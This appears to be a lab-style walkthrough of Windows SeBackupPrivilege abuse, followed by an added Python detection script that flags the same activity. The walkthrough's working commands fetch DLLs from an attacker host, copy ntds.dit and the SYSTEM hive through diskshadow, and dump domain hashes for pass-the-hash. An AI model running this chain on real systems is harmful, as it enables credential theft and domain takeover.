First, check whether the current user holds SeBackupPrivilege in the privilege information.
If so, we can read arbitrary files on the system, including the administrator's files, the SAM file, the SYSTEM registry hive, etc.
On the local machine, download the malicious DLLs from
```
# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll
# If winrm,
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Get-SeBackupPrivilege
```
```
Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
```
Create a diskshadow script file (diskshadow.txt) with the following content:

```
set metadata C:\tmp\tmp.cabs
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% h:
```
Upload this file to the remote machine.
```
# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/diskshadow.txt -OutFile .\diskshadow.txt
# If winrm,
upload diskshadow.txt
```
Then execute diskshadow.exe.
```
# /s: Specify the script file
diskshadow.exe /s .\diskshadow.txt
```
Now copy ntds.dit out of the exposed shadow copy (drive h:), save the SYSTEM hive, and download both files.

```
# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll
# If winrm,
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\tmp\ntds.dit -overwrite
reg save HKLM\SYSTEM c:\tmp\system

download ntds.dit
download system
```
Now we have the two files (ntds.dit and system) on the local machine.
We can dump the password hashes from them.
```
impacket-secretsdump -ntds ntds.dit -system system LOCAL
```
After that, crack the hashes or use them for pass-the-hash.
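From the defender's side, the chain above leaves a recognisable trail in process-creation telemetry: diskshadow.exe run with a script, reg.exe saving the SYSTEM or SAM hive, the SeBackupPrivilege cmdlet DLLs being imported, and ntds.dit being touched. The following added example (not part of the original page) correlates those indicators per user over a few constructed 4688-style records; a single diskshadow run, as a legitimate backup job would produce, stays below the threshold.

```python
import re
from collections import defaultdict

# Constructed process-creation records (user, command line) written for this
# example; they are not real telemetry.
SAMPLE_EVENTS = [
    {"user": "CORP\\backupop", "cmdline": r"diskshadow.exe /s .\diskshadow.txt"},
    {"user": "CORP\\backupop", "cmdline": r"reg save HKLM\SYSTEM c:\tmp\system"},
    {"user": "CORP\\backupop",
     "cmdline": r"powershell -c Import-Module .\SeBackupPrivilegeCmdLets.dll; "
                r"Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\tmp\ntds.dit -overwrite"},
    {"user": "CORP\\alice", "cmdline": r"reg query HKCU\Software\Classes"},
    # A scheduled backup also runs diskshadow with a script: one indicator only.
    {"user": "CORP\\bob", "cmdline": r"diskshadow.exe /s C:\scripts\nightly-backup.txt"},
]

# One regex per indicator; Windows command lines are case-insensitive.
RULES = {
    "diskshadow_script": re.compile(r"\bdiskshadow(?:\.exe)?\b.*\s/s\b", re.I),
    "reg_save_hive": re.compile(r"\breg(?:\.exe)?\s+save\s+HKLM\\(?:SYSTEM|SAM)\b", re.I),
    "sebackup_cmdlets": re.compile(
        r"SeBackupPrivilege(?:CmdLets|Utils)\.dll|Copy-FileSeBackupPrivilege", re.I),
    "ntds_dit_access": re.compile(r"\\ntds\\ntds\.dit\b", re.I),
}


def match_rules(cmdline):
    """Return the sorted names of every rule that fires on one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def correlate(events, min_rules=2):
    """Collect distinct rule hits per user and return only users that tripped
    at least min_rules different indicators, mapped to the sorted rule names."""
    hits = defaultdict(set)
    for ev in events:
        hits[ev["user"]].update(match_rules(ev["cmdline"]))
    return {user: sorted(names) for user, names in hits.items() if len(names) >= min_rules}


if __name__ == "__main__":
    for user, names in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {user}: {', '.join(names)}")
```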